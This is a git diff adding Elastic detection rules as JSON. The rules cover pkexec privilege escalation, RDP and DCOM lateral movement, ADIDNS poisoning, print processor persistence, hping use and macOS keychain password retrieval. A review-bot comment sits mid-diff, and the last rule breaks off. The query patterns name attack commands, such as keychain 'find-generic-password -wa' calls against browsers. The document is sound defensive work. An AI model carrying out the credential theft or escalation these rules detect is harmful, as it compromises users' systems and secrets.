@@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies unusual files downloaded from outside the local network that have the potential to be abused for code execution.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "File with Suspicious Extension Downloaded", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.extension : (\n \"appinstaller\", \"application\", \"appx\", \"appxbundle\", \"cpl\", \"diagcab\", \"diagpkg\", \"diagcfg\", \"manifest\",\n \"msix\", \"pif\", \"search-ms\", \"searchConnector-ms\", \"settingcontent-ms\", \"symlink\", \"theme\", \"themepack\" \n ) and file.Ext.windows.zone_identifier > 1 and\n not\n (\n file.extension : \"msix\" and \n file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\Microsoft.Winget.Source*\",\n \"?:\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\WinGet\\\\State\\\\defaultState\\\\Microsoft.PreIndexed.Package\\\\Microsoft.Winget.Source*\"\n )\n )\n", + "references": [ + "https://x.com/Laughing_Mantis/status/1518766501385318406", + "https://wikileaks.org/ciav7p1/cms/page_13763375.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.windows.zone_identifier", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "8d366588-cbd6-43ba-95b4-0971c3f906e5", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat 
Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "8d366588-cbd6-43ba-95b4-0971c3f906e5_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json new file mode 100644 index 00000000000..947af9c0346 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json 
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to exploit a local privilege escalation in polkit pkexec (CVE-2021-4034) via unsecure environment variable injection. Successful exploitation allows an unprivileged user to escalate to the root user.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via PKEXEC", + "query": "file where host.os.type == \"linux\" and file.path : \"/*GCONV_PATH*\"\n", + "references": [ + "https://seclists.org/oss-sec/2022/q1/80", + "https://haxx.in/files/blasty-vs-pkexec.c" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.007", + "name": "Path Interception by PATH Environment Variable", + "reference": "https://attack.mitre.org/techniques/T1574/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/8e39f54e-910b-4adb-a87e-494fbba5fb65_2.json b/packages/security_detection_engine/kibana/security_rule/8e39f54e-910b-4adb-a87e-494fbba5fb65_2.json new file mode 100644 index 00000000000..f819401b4cf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8e39f54e-910b-4adb-a87e-494fbba5fb65_2.json 
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Adversaries may attempt to connect to a remote system over Windows Remote Desktop Protocol (RDP) to achieve lateral movement. Adversaries may avoid using the Microsoft Terminal Services Client (mstsc.exe) binary to establish an RDP connection to evade detection.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Outgoing RDP Connection by Unusual Process", + "query": "network where host.os.type == \"windows\" and\n event.action == \"connection_attempted\" and destination.port == 3389 and\n destination.ip != \"::1\" and destination.ip != \"127.0.0.1\" and\n not (\n process.executable : (\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Program Files (x86)\\\\mRemoteNG\\\\mRemoteNG.exe\",\n \"?:\\\\Program Files (x86)\\\\PRTG Network Monitor\\\\PRTG Probe.exe\",\n \"?:\\\\Program Files\\\\Azure Advanced Threat Protection Sensor\\\\*\\\\Microsoft.Tri.Sensor.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Remote Desktop Connection Manager\\\\RDCMan.exe\"\n ) and process.code_signature.trusted == true\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "8e39f54e-910b-4adb-a87e-494fbba5fb65", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat 
Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "8e39f54e-910b-4adb-a87e-494fbba5fb65_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8f242ffb-b191-4803-90ec-0f19942e17fd_1.json b/packages/security_detection_engine/kibana/security_rule/8f242ffb-b191-4803-90ec-0f19942e17fd_1.json new file mode 100644 index 00000000000..cdb0ad5f952 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8f242ffb-b191-4803-90ec-0f19942e17fd_1.json 
@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Active Directory Integrated DNS (ADIDNS) is one of the core components of AD DS, leveraging AD's access control and replication to maintain domain consistency. It stores DNS zones as AD objects, a feature that, while robust, introduces some security issues, such as wildcard records, mainly because of the default permission (Any authenticated users) to create DNS-named records. Attackers can create wildcard records to redirect traffic that doesn't explicitly match records contained in the zone, becoming the Man-in-the-Middle and being able to abuse DNS similarly to LLMNR/NBNS spoofing.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential ADIDNS Poisoning via Wildcard Record Creation", + "query": "any where host.os.type == \"windows\" and event.action == \"Directory Service Changes\" and\n event.code == \"5137\" and startsWith(winlog.event_data.ObjectDN, \"DC=*,\")\n", + "references": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/", + "https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/adidns-spoofing" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.ObjectDN", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "8f242ffb-b191-4803-90ec-0f19942e17fd", + "setup": "## Setup\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with 
Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover the target object by default (we still need it to be configured to generate events), so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=MicrosoftDNS,DC=DomainDNSZones,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights CreateChild -InheritanceFlags Descendents -AttributeGUID e0fa1e8c-9b45-11d0-afdd-00c04fd930c9 -AuditFlags Success\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Active Directory", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1557", + "name": "Adversary-in-the-Middle", + "reference": "https://attack.mitre.org/techniques/T1557/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "8f242ffb-b191-4803-90ec-0f19942e17fd_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_106.json b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_106.json new file mode 100644 index 00000000000..545b2bbcbb9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_106.json 
@@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies port monitor and print processor registry modifications. Adversaries may abuse port monitor and print processors to run malicious DLLs during system boot that will be executed as SYSTEM for privilege escalation and/or persistence, if permissions allow writing a fully-qualified pathname for that DLL.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Port Monitor or Print Processor Registration Abuse", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Print\\\\Monitors\\\\*\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Print\\\\Environments\\\\Windows*\\\\Print Processors\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Print\\\\Monitors\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Print\\\\Environments\\\\Windows*\\\\Print Processors\\\\*\"\n ) and registry.data.strings : \"*.dll\" and\n /* exclude SYSTEM SID - look for changes by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n", + "references": [ + "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8f3e91c7-d791-4704-80a1-42c160d7aa27", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + 
"OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.010", + "name": "Port Monitors", + "reference": "https://attack.mitre.org/techniques/T1547/010/" + }, + { + "id": "T1547.012", + "name": "Print Processors", + "reference": "https://attack.mitre.org/techniques/T1547/012/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.010", + "name": "Port Monitors", + "reference": "https://attack.mitre.org/techniques/T1547/010/" + }, + { + "id": "T1547.012", + "name": "Print Processors", + "reference": "https://attack.mitre.org/techniques/T1547/012/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "8f3e91c7-d791-4704-80a1-42c160d7aa27_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_106.json b/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_106.json new file mode 100644 index 00000000000..16032ba4924 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_106.json 
@@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of Distributed Component Object Model (DCOM) to run commands from a remote host, which are launched via the ShellBrowserWindow or ShellWindows Application COM Object. This behavior may indicate an attacker abusing a DCOM application to stealthily move laterally.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows", + "query": "sequence by host.id with maxspan=5s\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"explorer.exe\"\n ] by process.parent.entity_id\n", + "references": [ + "https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + 
"ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "8f919d4b-a5af-47ca-a594-6be59cd924a4", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.003", + "name": "Distributed Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1021/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "8f919d4b-a5af-47ca-a594-6be59cd924a4_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_108.json b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_108.json new file mode 100644 index 00000000000..1bfc857d378 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_108.json 
@@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Hping ran on a Linux host. Hping is a FOSS command-line packet analyzer and has the ability to construct network packets for a wide variety of network security testing applications, including scanning and firewall auditing.", + "false_positives": [ + "Normal use of hping is uncommon apart from security testing and research. Use by non-security engineers is very uncommon." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Hping Process Activity", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name in (\"hping\", \"hping2\", \"hping3\")\n", + "references": [ + "https://en.wikipedia.org/wiki/Hping" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "90169566-2260-4824-b8e4-8615c3b4ed52", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "90169566-2260-4824-b8e4-8615c3b4ed52_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_107.json b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_107.json new file mode 100644 index 00000000000..5898e3bb6ec --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_107.json 
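Review bot: The `setup` text links the agent-policy guide at a pinned version, `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, while the sibling rule 9092cd6c in this diff and every other link in the same paragraph use `.../fleet/current/...`; the pinned URL will go stale. Change it to `https://www.elastic.co/guide/en/fleet/current/agent-policy.html`. The `tags` list also carries `Data Source: Auditd Manager` and `related_integrations` names `auditd_manager`, but the setup section only describes Elastic Defend and Auditbeat; a one-line pointer to that integration would complete it.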
@@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may collect keychain storage data from a system to in order to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features, including Wi-Fi and website passwords, secure notes, certificates, and Kerberos.", + "false_positives": [ + "Applications for password management." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Keychain Password Retrieval via Command Line", + "query": "process where host.os.type == \"macos\" and event.type == \"start\" and\n process.name : \"security\" and process.args : \"-wa\" and process.args : (\"find-generic-password\", \"find-internet-password\") and\n process.args : (\"Chrome*\", \"Chromium\", \"Opera\", \"Safari*\", \"Brave\", \"Microsoft Edge\", \"Edge\", \"Firefox*\") and\n not process.parent.executable : \"/Applications/Keeper Password Manager.app/Contents/Frameworks/Keeper Password Manager Helper*/Contents/MacOS/Keeper Password Manager Helper*\"\n", + "references": [ + "https://www.netmeister.org/blog/keychain-passwords.html", + "https://github.com/priyankchheda/chrome_password_grabber/blob/master/chrome.py", + "https://ss64.com/osx/security.html", + "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 73, 
+ "rule_id": "9092cd6c-650f-4fa3-8a8a-28256c7489c9", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
